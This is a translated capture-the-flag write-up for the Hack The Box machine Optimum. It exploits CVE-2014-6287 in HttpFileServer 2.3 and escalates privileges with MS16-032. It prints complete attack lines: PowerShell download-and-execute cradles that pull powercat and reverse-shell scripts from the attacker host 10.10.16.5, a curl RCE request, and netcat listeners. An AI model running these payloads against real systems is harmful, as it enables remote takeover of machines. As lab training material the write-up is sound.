Optimum - Easy - Hack The Box
This post was originally written in Spanish and translated into English using a large language model (LLM). Although the translation has been reviewed, it may contain inaccuracies or inconsistencies.
Description
In this post, we complete the Optimum write-up. We cover null byte injection, Python scripting, basic PowerShell for pentesting, CVE-2014-6287 for initial access and CVE-2016-0099, also known as MS16-032, for privilege escalation.
Reconnaissance
Port Scanning
We scan the open ports on Optimum with nmap:
1 | ❯ cat Puertos |
We run Nmap’s default scripts against the open ports to gather more information.
1 | ❯ cat Objetivos |
The target is a Windows web server running version 2.3 of the free file-sharing application HttpFileServer. We investigate it for vulnerabilities.
Searchsploit
We can use searchsploit to find vulnerabilities.
1 | ❯ searchsploit HttpFileServer 2.3 |
An available exploit provides RCE, and the vulnerability is assigned CVE-2014-6287.
Exploitation
HttpFileServer RCE — CVE-2014-6287
Let us examine how the exploit works.
1 | # Exploit Title: Rejetto Httpfileserver 2.3.X - Remote Command Execution (3) |
The code reveals how the attack works:
- 1 The search parameter is vulnerable to null byte injection with
%00,
allowing us to bypass sanitisation of thesearchfield. - 2
urllib.parse.quoteURL-encodes the payload. - 3
http.requestsends the request and triggers the RCE.
Manual Execution
1 - Create a small Python script that URL-encodes our payload.
1 | ❯ cat url_encoding.py |
2- Run the script with the payload ping /n 1 10.10.16.5. This command sends a ping to our machine, demonstrating the RCE.
1 | ❯ python3 url_encoding.py |
3- Listen on the interface that will receive the ping:
1 | ❯ sudo tcpdump -i tun0 |
4- Send the request with the payload injected into the URL:
1 | curl -s -X GET "10.10.10.8/?search=%00ping%20-n%201%2010.10.16.5" > /dev/null |
5- Receive the connection:
1 | ❯ sudo tcpdump -i tun0 |
We have RCE!
Reverse Shell
To obtain a reverse shell, we use powercat.ps1, which performs the same role as Netcat but is adapted for PowerShell. Here is its GitHub repository, along with the HackTricks page from which we obtain useful PowerShell commands.
1 - First, start a server from which to share the tool. I use Python.
1 | ❯ ls |
2 - Because we have RCE, use PowerShell to download the file to the victim and execute it to obtain the reverse shell:
- The PowerShell path we use is
c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe. - Use this function to download a file with PowerShell:
IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.5:8000/powercat.ps1'). - Use this syntax to obtain a reverse shell with Powercat:
powercat -c 10.10.16.5 -p 1234 -e cmd. - The complete payload is:
c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.5:8000/powercat.ps1');powercat -c 10.10.16.5 -p 1234 -e cmd.
3 - Modify the script to send the request using the requests library:
1 | ❯ cat RCE_Optimum.py |
4 - Start an nc listener with rlwrap for a more interactive shell:
1 | ❯ rlwrap nc -lvnp 1234 |
5 - Run the script with the payload:
1 | ❯ python3 RCE_Optimum.py |
6 - Receive the shell:
1 | ❯ rlwrap nc -lvnp 1234 |
Privilege Escalation
System Reconnaissance
Use systeminfo to obtain the operating system version:
1 | systeminfo |
The operating system is Windows Server 2012 R2 Standard | 6.3.9600 N/A Build 9600. A web search leads us to this PowerShell privilege-escalation exploit on Exploit-DB.
Invoke-Ms16032.Ps1
After the exploit failed several times, I found a script that can add a command to be executed as nt authority\system: Invoke-MS16023.ps1.
1 - Create a PowerShell reverse shell with the required parameters:
1 | ❯ cat revshell.ps1 |
2 - At the end of Invoke-MS16023.ps1, add the command to execute using Invoke-MS16-032 -Command "$cmd". Our command is:
1 | Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('http://10.10.16.5:8000/revshell.ps1')"; |
3 - Share revshell.ps1 and Invoke-MS16023.ps1 from a Python server so that the victim can access them.
1 | ❯ python3 -m http.server --bind 10.10.16.5 |
4 - Listen on the corresponding port.
1 | ❯ rlwrap nc -lvnp 2222 |
5 - From the victim, download and execute Invoke-MS16023.ps1. It requests revshell.ps1 and runs it as nt authority\system, establishing the connection.
1 | C:\Users\kostas\Desktop>powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.16.5:8000/Invoke-MS16032.ps1')" |
6 - Receive the connection:
1 | ❯ rlwrap nc -lvnp 2222 |
We are nt authority\system!
Flags
User.Txt
1 | C:\Users\kostas\Desktop> type user.txt.txt |
Root.Txt
1 | C:\Users\Administrator\Desktop>type root.txt |
Knowledge Gained
The Optimum machine teaches us the following:
- Port reconnaissance with
nmap. - Vulnerability research with
searchsploit. - Null byte injection.
- Automation scripting with Python.
- Using
powercat. - Basic PowerShell for pentesting.
Potential Errors
One possible error is the following:
- The exploit from Exploit-DB will not successfully escalate privileges.
Credits and References
Machine author: ch4p. Thank you for creating Optimum and contributing it to the community.



